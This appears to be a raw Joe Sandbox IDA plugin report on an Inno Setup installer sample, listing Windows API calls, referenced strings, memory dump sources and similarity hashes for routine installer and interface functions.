                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                                    • 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                                    • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A159ClassInfoMessageSend
                                                                                    • String ID: COMBOBOX$Inno Setup: Language
                                                                                    • API String ID: 3375322265-4234151509
                                                                                    • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                    • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                                    • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                    • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                      • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                      • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                    • API String ID: 1044490935-665933166
                                                                                    • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                    • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                    • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                    • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                    • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                      • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                      • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                    • String ID: ,$?
                                                                                    • API String ID: 2359071979-2308483597
                                                                                    • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                    • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                    • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                    • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                    APIs
                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                    • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                    • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                    • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                    • String ID:
                                                                                    • API String ID: 1030595962-0
                                                                                    • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                    • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                                    • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                    • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                    APIs
                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                    • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                    • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                    • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                    • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                    • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                    • String ID:
                                                                                    • API String ID: 2733548868-0
                                                                                    • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                    • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                    • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                    • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                      • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                      • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                      • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                                    • TranslateMessage.USER32(?), ref: 004565AB
                                                                                    • DispatchMessageA.USER32(?), ref: 004565B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                    • String ID: [Paused]
                                                                                    • API String ID: 1715372110-4230553315
                                                                                    • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                    • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                                    • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                    • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                                    APIs
                                                                                    • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                                    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                                    • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LoadSleep
                                                                                    • String ID: CheckPassword
                                                                                    • API String ID: 4023313301-1302249611
                                                                                    • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                    • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                                    • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                    • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                                    APIs
                                                                                      • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                      • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                      • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                                    • GetTickCount.KERNEL32 ref: 0047678E
                                                                                    • GetTickCount.KERNEL32 ref: 00476798
                                                                                    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                                    Strings
                                                                                    • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                                    • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
• API String ID: 613034392-3771334282
• Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
• Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
• Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
• Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D

APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
Strings
• .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
• Fusion.dll, xrefs: 00458EFF
• CreateAssemblyCache, xrefs: 00458F56
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
• Failed to load .NET Framework DLL "%s", xrefs: 00458F44
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
• Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
• Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
• Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
• Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799

APIs
  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
• GetFocus.USER32 ref: 0041C178
• 73A0A570.USER32(?), ref: 0041C184
• 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
• 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
• 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
• 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
Similarity
• API ID: A08830$A022A480A570BitsFocusObject
• String ID:
• API String ID: 1424713005-0
• Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
• Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
• Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28

APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C80
• GetSystemMetrics.USER32(0000000D), ref: 00418C88
• 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
  • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
• 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
• 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
• 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
• 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
Similarity
• API ID: MetricsSystem$C400C740F520860F522980
• String ID:
• API String ID: 2856677924-0
• Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
• Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
• Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759

APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
Strings
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
• Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
• Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
• Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D

APIs
• SelectObject.GDI32(00000000,?), ref: 0041B480
• SelectObject.GDI32(?,00000000), ref: 0041B48F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
• SelectObject.GDI32(?,00000000), ref: 0041B4D7
• DeleteDC.GDI32(00000000), ref: 0041B4E0
• DeleteDC.GDI32(?), ref: 0041B4E9
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
• Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
• Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
• Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54

APIs
• 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(00000000,00000000), ref: 0049399B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
• GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
• 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
Similarity
• API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1435929781-222967699
• Opcode ID: 15a797e3667a903f5c914f6a817bc36f585e6b4d828b97bd12db5e7176161fac
• Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
• Opcode Fuzzy Hash: 15a797e3667a903f5c914f6a817bc36f585e6b4d828b97bd12db5e7176161fac
• Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24

APIs
• GetCursorPos.USER32 ref: 004233BF
• WindowFromPoint.USER32(?,?), ref: 004233CC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
• GetCurrentThreadId.KERNEL32 ref: 004233E1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
• SetCursor.USER32(00000000), ref: 00423423
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
• Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
• Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
• Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD

APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
• Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
• Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
• Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
• GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
• CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
Strings
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-911929905
                                                                                    • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                    • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                                    • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                    • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompress), ref: 0045CDC1
                                                                                    • GetProcAddress.KERNEL32(02470000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                    • API String ID: 190572456-212574377
                                                                                    • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                    • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                                    • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                    • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                                    APIs
